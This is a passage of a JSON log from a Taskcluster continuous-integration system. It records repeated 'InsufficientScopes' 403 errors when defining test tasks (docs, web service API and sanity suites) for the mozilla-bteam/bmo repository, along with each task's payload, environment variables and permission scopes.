\\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"QKJeYnbsTw-iD6uK1kPJUQ\"\n                },\n                \"payload\": {\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"workerType\": \"github-worker\",\n                    \"routes\": [\n                        \"notify.email.mozilla-bteam@noreply.github.com.on-any\",\n                        \"notify.irc-channel.#bteam.on-failed\",\n                        \"notify.irc-channel.#bteam.on-exception\"\n                    ],\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.opened\",\n                                \"pull_request.synchronize\",\n                                \"pull_request.reopened\",\n                                \"push\"\n                            ]\n                        },\n                        \"treeherder\": {\n                            \"symbol\": \"Doc\",\n                            \"machine\": {\n                                \"platform\": \"linux64\",\n                                \"build\": {\n                                    \"platform\": \"linux64\"\n                                }\n                            }\n                        }\n                    },\n                    \"payload\": {\n                        \"maxRunTime\": 3600,\n                        \"reruns\": 3,\n                        \"image\": \"mozillabteam/bmo-ci\",\n                        \"command\": [\n                            \"runtests.sh\"\n                        ],\n                        \"env\": {\n                            \"TEST_SUITE\": \"docs\",\n                            \"GITHUB_EVENT\": \"pull_request.synchronize\",\n                            \"GITHUB_BRANCH\": \"master\",\n                            \"GITHUB_PULL_REQUEST\": 8,\n                            \"GITHUB_BASE_REPO_URL\": \"https://github.com/mozilla-bteam/bmo.git\",\n                            \"GITHUB_BASE_USER\": \"mozilla-bteam\",\n                            \"GITHUB_BASE_SHA\": \"639a051e3aea3608efd7607b944b2c33aa17cfe5\",\n                            \"GITHUB_BASE_BRANCH\": \"master\",\n                            \"GITHUB_BASE_REF\": \"master\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/mozilla-bteam/bmo.git\",\n                            \"GITHUB_HEAD_USER\": \"mozilla-bteam\",\n                            \"GITHUB_HEAD_SHA\": \"4250271527caadb3eefd54ccf068f610f5d93a46\",\n                            \"GITHUB_HEAD_BRANCH\": \"development\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"mozilla-bteam@noreply.github.com\"\n                        },\n                        \"artifacts\": {\n                            \"public/runtests_log\": {\n                                \"type\": \"file\",\n                                \"path\": \"/var/log/runtests.log\",\n                                \"expires\": \"2018-02-17T17:33:38.806Z\"\n                            }\n                        }\n                    },\n                    \"metadata\": {\n                        \"name\": \"Documentation Build Test\",\n                        \"description\": \"Documentation Build Test\",\n                        \"owner\": \"mozilla-bteam@noreply.github.com\",\n                        \"source\": \"https://github.com/mozilla-bteam/bmo.git\"\n                    },\n                    \"created\": \"2016-09-28T02:27:09.131Z\",\n                    \"deadline\": \"2016-09-29T02:27:09.131Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"D-DfahTTRYOxDmjmjfK8Ew\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"scopes\": [],\n                    \"tags\": {},\n                    \"expires\": \"2017-09-29T02:27:09.131Z\"\n                },\n                \"time\": \"2016-09-28T02:27:09.285Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\",\n                        \"queue:route:notify.irc-channel.#bteam.on-failed\",\n                        \"queue:route:notify.irc-channel.#bteam.on-exception\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla-bteam/bmo:pull-request\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:define-task:aws-provisioner-v1/b2gtest\",\n                    \"queue:route:gaia-taskcluster\",\n                    \"queue:route:index.garbage.*\",\n                    \"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\",\n                    \"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\",\n                    \"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\",\n                    \"queue:route:tc-treeherder.bmo-development.*\",\n                    \"queue:route:tc-treeherder.bmo-master.*\",\n                    \"queue:route:tc-treeherder.bmo-upstream-merge.*\",\n                    \"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\",\n                    \"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\",\n                    \"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    },\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-bteam/bmo:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n  \\\"queue:route:gaia-taskcluster\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"PI-ow2qqQb6vmMrQXMz4DA\\\"}\\n  payload:  {\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"routes\\\": [\\n    \\\"notify.email.mozilla-bteam@noreply.github.com.on-any\\\",\\n    \\\"notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"notify.irc-channel.#bteam.on-exception\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.opened\\\",\\n        \\\"pull_request.synchronize\\\",\\n        \\\"pull_request.reopened\\\",\\n        \\\"push\\\"\\n      ]\\n    },\\n    \\\"treeherder\\\": {\\n      \\\"symbol\\\": \\\"API\\\",\\n      \\\"machine\\\": {\\n        \\\"platform\\\": \\\"linux64\\\",\\n        \\\"build\\\": {\\n          \\\"platform\\\": \\\"linux64\\\"\\n        }\\n      }\\n    }\\n  },\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 3600,\\n    \\\"reruns\\\": 3,\\n    \\\"image\\\": \\\"mozillabteam/bmo-ci\\\",\\n    \\\"command\\\": [\\n      \\\"runtests.sh\\\"\\n    ],\\n    \\\"env\\\": {\\n      \\\"TEST_SUITE\\\": \\\"webservices\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.synchronize\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 8,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-bteam\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"639a051e3aea3608efd7607b944b2c33aa17cfe5\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"mozilla-bteam\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"4250271527caadb3eefd54ccf068f610f5d93a46\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"mozilla-bteam@noreply.github.com\\\"\\n    },\\n    \\\"artifacts\\\": {\\n      \\\"public/runtests_log\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/var/log/runtests.log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      },\\n      \\\"public/httpd_error_log\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/var/log/httpd/error_log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      }\\n    }\\n  },\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"WebService API Tests\\\",\\n    \\\"description\\\": \\\"WebService API Tests\\\",\\n    \\\"owner\\\": \\\"mozilla-bteam@noreply.github.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\"\\n  },\\n  \\\"created\\\": \\\"2016-09-28T02:27:09.131Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-29T02:27:09.131Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"D-DfahTTRYOxDmjmjfK8Ew\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"scopes\\\": [],\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-29T02:27:09.131Z\\\"\\n}\\n  time:     2016-09-28T02:27:09.273Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-bteam/bmo:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n    \\\"queue:route:gaia-taskcluster\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-bteam/bmo:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n  \\\"queue:route:gaia-taskcluster\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"PI-ow2qqQb6vmMrQXMz4DA\\\"}\\n  payload:  {\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"routes\\\": [\\n    \\\"notify.email.mozilla-bteam@noreply.github.com.on-any\\\",\\n    \\\"notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"notify.irc-channel.#bteam.on-exception\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.opened\\\",\\n        \\\"pull_request.synchronize\\\",\\n        \\\"pull_request.reopened\\\",\\n        \\\"push\\\"\\n      ]\\n    },\\n    \\\"treeherder\\\": {\\n      \\\"symbol\\\": \\\"API\\\",\\n      \\\"machine\\\": {\\n        \\\"platform\\\": \\\"linux64\\\",\\n        \\\"build\\\": {\\n          \\\"platform\\\": \\\"linux64\\\"\\n        }\\n      }\\n    }\\n  },\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 3600,\\n    \\\"reruns\\\": 3,\\n    \\\"image\\\": \\\"mozillabteam/bmo-ci\\\",\\n    \\\"command\\\": [\\n      \\\"runtests.sh\\\"\\n    ],\\n    \\\"env\\\": {\\n      \\\"TEST_SUITE\\\": \\\"webservices\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.synchronize\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 8,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-bteam\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"639a051e3aea3608efd7607b944b2c33aa17cfe5\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"mozilla-bteam\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"4250271527caadb3eefd54ccf068f610f5d93a46\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"mozilla-bteam@noreply.github.com\\\"\\n    },\\n    \\\"artifacts\\\": {\\n      \\\"public/runtests_log\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/var/log/runtests.log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      },\\n      \\\"public/httpd_error_log\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/var/log/httpd/error_log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      }\\n    }\\n  },\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"WebService API Tests\\\",\\n    \\\"description\\\": \\\"WebService API Tests\\\",\\n    \\\"owner\\\": \\\"mozilla-bteam@noreply.github.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\"\\n  },\\n  \\\"created\\\": \\\"2016-09-28T02:27:09.131Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-29T02:27:09.131Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"D-DfahTTRYOxDmjmjfK8Ew\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"scopes\\\": [],\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-29T02:27:09.131Z\\\"\\n}\\n  time:     2016-09-28T02:27:09.273Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-bteam/bmo:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n    \\\"queue:route:gaia-taskcluster\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"PI-ow2qqQb6vmMrQXMz4DA\"\n                },\n                \"payload\": {\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"workerType\": \"github-worker\",\n                    \"routes\": [\n                        \"notify.email.mozilla-bteam@noreply.github.com.on-any\",\n                        \"notify.irc-channel.#bteam.on-failed\",\n                        \"notify.irc-channel.#bteam.on-exception\"\n                    ],\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.opened\",\n                                \"pull_request.synchronize\",\n                                \"pull_request.reopened\",\n                                \"push\"\n                            ]\n                        },\n                        \"treeherder\": {\n                            \"symbol\": \"API\",\n                            \"machine\": {\n                                \"platform\": \"linux64\",\n                                \"build\": {\n                                    \"platform\": \"linux64\"\n                                }\n                            }\n                        }\n                    },\n                    \"payload\": {\n                        \"maxRunTime\": 3600,\n                        \"reruns\": 3,\n                        \"image\": \"mozillabteam/bmo-ci\",\n                        \"command\": [\n                            \"runtests.sh\"\n                        ],\n                        \"env\": {\n                            \"TEST_SUITE\": \"webservices\",\n                            \"GITHUB_EVENT\": \"pull_request.synchronize\",\n                            \"GITHUB_BRANCH\": \"master\",\n                            \"GITHUB_PULL_REQUEST\": 8,\n                            \"GITHUB_BASE_REPO_URL\": \"https://github.com/mozilla-bteam/bmo.git\",\n                            \"GITHUB_BASE_USER\": \"mozilla-bteam\",\n                            \"GITHUB_BASE_SHA\": \"639a051e3aea3608efd7607b944b2c33aa17cfe5\",\n                            \"GITHUB_BASE_BRANCH\": \"master\",\n                            \"GITHUB_BASE_REF\": \"master\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/mozilla-bteam/bmo.git\",\n                            \"GITHUB_HEAD_USER\": \"mozilla-bteam\",\n                            \"GITHUB_HEAD_SHA\": \"4250271527caadb3eefd54ccf068f610f5d93a46\",\n                            \"GITHUB_HEAD_BRANCH\": \"development\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"mozilla-bteam@noreply.github.com\"\n                        },\n                        \"artifacts\": {\n                            \"public/runtests_log\": {\n                                \"type\": \"file\",\n                                \"path\": \"/var/log/runtests.log\",\n                                \"expires\": \"2018-02-17T17:33:38.806Z\"\n                            },\n                            \"public/httpd_error_log\": {\n                                \"type\": \"file\",\n                                \"path\": \"/var/log/httpd/error_log\",\n                                \"expires\": \"2018-02-17T17:33:38.806Z\"\n                            }\n                        }\n                    },\n                    \"metadata\": {\n                        \"name\": \"WebService API Tests\",\n                        \"description\": \"WebService API Tests\",\n                        \"owner\": \"mozilla-bteam@noreply.github.com\",\n                        \"source\": \"https://github.com/mozilla-bteam/bmo.git\"\n                    },\n                    \"created\": \"2016-09-28T02:27:09.131Z\",\n                    \"deadline\": \"2016-09-29T02:27:09.131Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"D-DfahTTRYOxDmjmjfK8Ew\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"scopes\": [],\n                    \"tags\": {},\n                    \"expires\": \"2017-09-29T02:27:09.131Z\"\n                },\n                \"time\": \"2016-09-28T02:27:09.273Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\",\n                        \"queue:route:notify.irc-channel.#bteam.on-failed\",\n                        \"queue:route:notify.irc-channel.#bteam.on-exception\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla-bteam/bmo:pull-request\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:define-task:aws-provisioner-v1/b2gtest\",\n                    \"queue:route:gaia-taskcluster\",\n                    \"queue:route:index.garbage.*\",\n                    \"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\",\n                    \"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\",\n                    \"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\",\n                    \"queue:route:tc-treeherder.bmo-development.*\",\n                    \"queue:route:tc-treeherder.bmo-master.*\",\n                    \"queue:route:tc-treeherder.bmo-upstream-merge.*\",\n                    \"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\",\n                    \"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\",\n                    \"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    },\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-bteam/bmo:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n  \\\"queue:route:gaia-taskcluster\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"KZ3crLfVReGYqH3eLNRtbQ\\\"}\\n  payload:  {\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"routes\\\": [\\n    \\\"notify.email.mozilla-bteam@noreply.github.com.on-any\\\",\\n    \\\"notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"notify.irc-channel.#bteam.on-exception\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.opened\\\",\\n        \\\"pull_request.synchronize\\\",\\n        \\\"pull_request.reopened\\\",\\n        \\\"push\\\"\\n      ]\\n    },\\n    \\\"treeherder\\\": {\\n      \\\"symbol\\\": \\\"San\\\",\\n      \\\"machine\\\": {\\n        \\\"platform\\\": \\\"linux64\\\",\\n        \\\"build\\\": {\\n          \\\"platform\\\": \\\"linux64\\\"\\n        }\\n      }\\n    }\\n  },\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 3600,\\n    \\\"reruns\\\": 3,\\n    \\\"image\\\": \\\"mozillabteam/bmo-ci\\\",\\n    \\\"command\\\": [\\n      \\\"runtests.sh\\\"\\n    ],\\n    \\\"env\\\": {\\n      \\\"TEST_SUITE\\\": \\\"sanity\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.synchronize\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 8,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-bteam\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"639a051e3aea3608efd7607b944b2c33aa17cfe5\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"mozilla-bteam\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"4250271527caadb3eefd54ccf068f610f5d93a46\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"mozilla-bteam@noreply.github.com\\\"\\n    },\\n    \\\"artifacts\\\": {\\n      \\\"public/runtests_log\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/var/log/runtests.log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      }\\n    }\\n  },\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"Basic Sanity Tests\\\",\\n    \\\"description\\\": \\\"Basic Sanity Tests\\\",\\n    \\\"owner\\\": \\\"mozilla-bteam@noreply.github.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\"\\n  },\\n  \\\"created\\\": \\\"2016-09-28T02:27:09.131Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-29T02:27:09.131Z\\\",\\n  \\\"schedulerId\\\": 